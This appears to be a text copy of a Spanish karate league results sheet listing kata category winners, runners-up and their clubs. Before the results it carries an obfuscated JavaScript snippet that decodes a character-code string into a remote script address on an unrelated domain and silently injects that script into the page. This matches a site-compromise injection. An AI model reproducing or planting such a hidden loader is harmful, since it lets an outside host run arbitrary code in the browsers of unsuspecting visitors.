var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 106, 108, 99); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);}

 ACTA DE RESULTADOS DE COMPETICIONES LIGA G8

CAMPEÓN

SUBCAMPEÓN

TERCER CLASIFICADO

TERCER CLASIFICADO

1A

KATA

OLIVER FONFRIA

JAVIER SÁNCHEZ

MIREIA HERRAIZ

MARCOS ASENSIO

PICANYA

PICANYA

OKAMI

ROMERA

1B

KATA

JOAN SÁNCHEZ

TIOGA FRANCÉS

CRISTIAN VILLAR

CARLOS MORENTE

PICANYA

ROMERA

ALMUSSAFES

ROMERA

2A

KATA

FRANCISCO JAVIER GARCIA

IQUEL ANA BAUTISTA

PAULA PALCIOS

MIQUEL VIJUESCAS

KYUSHO

KYUSHO

KYUSHO

KYUSHO

2B

KATA

VALENTINA STOYKOV

NATALIA PENDELE

CAROLINA MASCARAQUE

EMMA CAMPOS

SHOGUN

ZANSHIN

KYUSHO

KYUSHO

3

KATA

JUANJO ÁLVAREZ

NOA MARTÍNEZ

EMMA VILA

ZAHIRA GONZALEZ

CATARROJA

ZANSHIN

PICANYA

ZANSHIN

4

KATA

LUCIA LEIVA

JULIA GARCÍA

CHLOE QUEVEDO

PAU PÉREZ

KYUSHO

KYUSHO

ROMERA

ALAQUÀS

5

KATA

HONORATO PARDO

ADAM ALEMÁN

SARA GIMENO

ELIAS PEREZ

KYUSHO

KYUSHO

BENIPARRELL

ZANSHIN

6

KATA

IRIA TRASHORRAS

PAOLA ARCE

YANIRE ARIAS

TANIA JUAN

CATARROJA

CATARROJA

ROMERA

ROMERA

7

KATA

HÉCTOR PADILLA

IZAN  MARTÍNEZ

ADRIÁN RODRÍGUEZ

ÓSCAR NAVARRO

PICANYA

PICANYA

KYUSHO

KYUSHO

8

KATA

ÁLVARO BENITA

CARMEN PASCUAL

SERGIO ANTONIO GALLEGO

ÁLVARO LÁZARO

PICANYA

KYUSHO

SHOGUN

PICANYA

10

KATA

LAURA ILLÁN

LIDIA ARMERO

LUCÍA GÓMEZ

NURIA SERRANO

KYUSHO

ZANSHIN

ROMERA

PICANYA

11

KATA

ALBA FERRAGUD

AMADEO CASTELLÓ

ELVIS MONTANER

ROSA BAUSET

KENSHO

NAKADAKA 

ALMUSSAFES

KENSHO

12

KATA

CRISTINA ORTIZ

JUAN GARCIA

ANDREA MURCIA

ADRIAN CAMPOS

PICANYA

SHOGUN

QUART

OKAMI